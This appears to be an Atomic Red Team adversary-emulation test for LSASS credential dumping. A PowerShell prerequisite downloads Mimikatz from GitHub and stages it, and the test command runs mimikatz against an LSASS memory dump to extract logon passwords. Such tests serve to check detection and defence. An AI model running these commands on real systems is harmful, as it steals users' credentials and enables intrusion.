#TechniqueName: OS Credential Dumping: LSASS Memory
#AtomicTestName: Offline Credential Theft With Mimikatz
#Language: cmd

#get_prereq_commands
$url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
$request = [System.Net.WebRequest]::Create($url)
$response = $request.GetResponse()
$realTagUrl = $response.ResponseUri.OriginalString
$version = $realTagUrl.split('/')[-1]
$fileName = 'mimikatz_trunk.zip'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName
Invoke-WebRequest $realDownloadUrl -OutFile "$env:TEMP\Mimi.zip"
Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
New-Item -ItemType Directory (Split-Path PathToAtomicsFolder\T1003.001\bin\mimikatz.exe) -Force | Out-Null
Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe PathToAtomicsFolder\T1003.001\bin\mimikatz.exe -Force


#prereq_commands
if (Test-Path PathToAtomicsFolder\T1003.001\bin\mimikatz.exe) {exit 0} else {exit 1}


#commands
PathToAtomicsFolder\T1003.001\bin\mimikatz.exe "sekurlsa::minidump %tmp%\lsass.DMP" "sekurlsa::logonpasswords full" exit

